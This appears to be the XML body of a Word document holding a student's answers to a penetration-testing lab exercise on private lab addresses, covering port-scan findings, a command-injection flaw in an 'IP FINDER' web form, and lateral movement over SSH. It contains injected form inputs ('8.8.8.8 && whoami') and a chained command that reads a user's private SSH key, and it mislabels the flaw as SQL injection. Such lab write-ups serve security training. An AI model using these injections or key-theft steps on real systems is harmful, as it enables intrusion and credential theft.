          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2FD7">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Interpret your results and determine the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E66E2" w14:textId="305D7F64" w:rsidR="00DF2FD7" w:rsidRPr="00DF2FD7" w:rsidRDefault="00DF2FD7" w:rsidP="00DF2FD7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ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2FD7">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Which host is running a web server on a non-standard port? What port is it running on? </w:t>
      </w:r>
      <w:r w:rsidR="00B9157C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B9157C" w:rsidRPr="00B9157C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>172.31.55.221 Port 1013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DE974" w14:textId="0E3643B5" w:rsidR="00DF2FD7" w:rsidRPr="00DF2FD7" w:rsidRDefault="00DF2FD7" w:rsidP="00DF2FD7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ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2FD7">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Which host is running an SSH server on a non-standard port? What port is it running on? </w:t>
      </w:r>
      <w:r w:rsidR="00B9157C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B9157C" w:rsidRPr="00B9157C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>172.31.55.242 Port 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3202ED" w14:textId="77777777" w:rsidR="00DF2FD7" w:rsidRDefault="00DF2FD7" w:rsidP="00DF2FD7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ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2FD7">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Which machines are running Windows-based operating systems?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AB9731" w14:textId="54F1B6DE" w:rsidR="00B9157C" w:rsidRPr="00DF2FD7" w:rsidRDefault="00FF560A" w:rsidP="00B9157C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF560A">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>172.31.54.247 + 172.31.59.127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF9C5E" w14:textId="77777777" w:rsidR="00FD31AB" w:rsidRDefault="00FD31AB"/>
    <w:p w14:paraId="635611F0" w14:textId="77777777" w:rsidR="00DF2FD7" w:rsidRDefault="00DF2FD7"/>
    <w:p w14:paraId="71071CB2" w14:textId="4DE86FCD" w:rsidR="00BA1741" w:rsidRDefault="00BA1741"/>
    <w:p w14:paraId="2A6A2B5F" w14:textId="77777777" w:rsidR="003B51D3" w:rsidRDefault="003B51D3"/>
    <w:p w14:paraId="6597B2A1" w14:textId="0AFDE534" w:rsidR="009A6EE5" w:rsidRDefault="009A6EE5" w:rsidP="009A6EE5">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Challenge 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2539C551" w14:textId="77777777" w:rsidR="009A6EE5" w:rsidRPr="009A6EE5" w:rsidRDefault="009A6EE5" w:rsidP="009A6E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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6EE5">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access the site hosted on the webserver you found in the previous step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34537970" w14:textId="77777777" w:rsidR="009A6EE5" w:rsidRDefault="009A6EE5" w:rsidP="009A6EE5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2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6EE5">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hint: How do you access a website on a custom port number? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA351B" w14:textId="27115E10" w:rsidR="002C4F98" w:rsidRDefault="002C4F98" w:rsidP="002C4F98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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BBF6CE" w14:textId="14F21209" w:rsidR="002C4F98" w:rsidRDefault="00644AD4" w:rsidP="002C4F98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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644AD4">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>172.31.55.221:1013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F660D1F" w14:textId="1E1D519D" w:rsidR="002C4F98" w:rsidRDefault="00644AD4" w:rsidP="002C4F98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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644AD4">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs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65D0C8B4" wp14:editId="418B04D6">
            <wp:extent cx="5943600" cy="2787015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12979822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98222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A8E99" w14:textId="77777777" w:rsidR="002C4F98" w:rsidRPr="009A6EE5" w:rsidRDefault="002C4F98" w:rsidP="002C4F98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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D16929" w14:textId="3BA0B124" w:rsidR="002C4F98" w:rsidRPr="002C4F98" w:rsidRDefault="009A6EE5" w:rsidP="002C4F9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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6EE5">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Explore the web pages available to you. What would be a good place to attempt some attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BC76A9" w14:textId="77777777" w:rsidR="009A6EE5" w:rsidRDefault="009A6EE5" w:rsidP="009A6EE5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2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6EE5">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hint: Your first goal should be to test anything that handles user input. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CEB410" w14:textId="0AC320DA" w:rsidR="004A66C9" w:rsidRDefault="004A66C9" w:rsidP="004A66C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060BAF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP FINDER</w:t>
      </w:r>
      <w:r w:rsidR="00060BAF" w:rsidRPr="00060BAF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = SQL INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C560A2" w14:textId="125A34C4" w:rsidR="004A66C9" w:rsidRPr="009A6EE5" w:rsidRDefault="004A66C9" w:rsidP="004A66C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A66C9">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato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29A6EB71" wp14:editId="0492C94B">
            <wp:extent cx="5943600" cy="1151890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9144186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41868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10A91" w14:textId="77777777" w:rsidR="009A6EE5" w:rsidRDefault="009A6EE5" w:rsidP="009A6E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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A6EE5">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Demonstrate you can run commands on the target system by running the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A6EE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="E0061F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A6EE5">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C92B237" w14:textId="77777777" w:rsidR="004A66C9" w:rsidRDefault="004A66C9" w:rsidP="004A66C9">
      <w:p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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4A3646" w14:textId="4D9D6339" w:rsidR="004A66C9" w:rsidRPr="00060BAF" w:rsidRDefault="004A66C9" w:rsidP="004A66C9">
      <w:p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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060BAF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">8.8.8.8 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00060BAF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F463193" w14:textId="3C6E221C" w:rsidR="004A66C9" w:rsidRPr="009A6EE5" w:rsidRDefault="004A66C9" w:rsidP="004A66C9">
      <w:p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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00060BAF">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D05FE48" w14:textId="7D209C3A" w:rsidR="009A6EE5" w:rsidRDefault="001B5C55" w:rsidP="001B5C55">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Challenge 3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EB33FB" w14:textId="77777777" w:rsidR="001B5C55" w:rsidRPr="001B5C55" w:rsidRDefault="001B5C55" w:rsidP="001B5C5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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5C55">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Search the webserver for SSH keys you can copy. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32360957" w14:textId="77777777" w:rsidR="001B5C55" w:rsidRDefault="001B5C55" w:rsidP="001B5C55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2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5C55">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hint: Where do each users' SSH keys tend to live? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A597E9" w14:textId="1CCF2D36" w:rsidR="001B5C55" w:rsidRDefault="001B5C55" w:rsidP="001B5C55">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6BB4">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8.8.8.8 &amp;&amp; cd /home/ &amp;&amp; ls -la &amp;&amp; cd www-data &amp;&amp; ls -la &amp;&amp; cd .ssh &amp;&amp; ls -la &amp;&amp; cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE6BB4">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>id_rsa.pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10ABBCB6" w14:textId="4ECB7ECD" w:rsidR="001B5C55" w:rsidRDefault="001B5C55" w:rsidP="001B5C55">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5C55">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52CE187B" wp14:editId="58D8A4C7">
            <wp:extent cx="5943600" cy="3788410"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="8844049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40492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9D7B" w14:textId="77777777" w:rsidR="001B5C55" w:rsidRPr="001B5C55" w:rsidRDefault="001B5C55" w:rsidP="001B5C55">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E110A52" w14:textId="77777777" w:rsidR="001B5C55" w:rsidRDefault="001B5C55" w:rsidP="001B5C5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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5C55">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once you've found a key to test, copy it to your Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1BE3F" w14:textId="6CC7F42C" w:rsidR="00644AD4" w:rsidRPr="001B5C55" w:rsidRDefault="00644AD4" w:rsidP="00644AD4">
      <w:p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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644AD4">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Copied the private key as a text editor and placed it on your desktop.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EE8C5D" w14:textId="77777777" w:rsidR="00FF44C8" w:rsidRDefault="00FF44C8" w:rsidP="007A06A7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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="761DDB7C" w14:textId="77777777" w:rsidR="007A06A7" w:rsidRPr="001B5C55" w:rsidRDefault="007A06A7" w:rsidP="004A66C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A53056" w14:textId="77777777" w:rsidR="001B5C55" w:rsidRDefault="001B5C55" w:rsidP="001B5C5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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5C55">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use the key to connect from your Kali machine to the other Linux server you found earlier, using the non-standard port number revealed in your scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4259A8C7" w14:textId="77777777" w:rsidR="002672ED" w:rsidRDefault="002672ED" w:rsidP="002672ED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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB85755" w14:textId="0C8628B2" w:rsidR="002672ED" w:rsidRPr="002672ED" w:rsidRDefault="002672ED" w:rsidP="002672ED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24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002672ED">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002672ED">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alice-devops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09B13C6D" w14:textId="197E75D2" w:rsidR="002672ED" w:rsidRPr="002672ED" w:rsidRDefault="002672ED" w:rsidP="002672ED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24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002672ED">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using another key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5E727A" w14:textId="75E78AC3" w:rsidR="000E61FA" w:rsidRDefault="00201BF9" w:rsidP="00FF44C8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
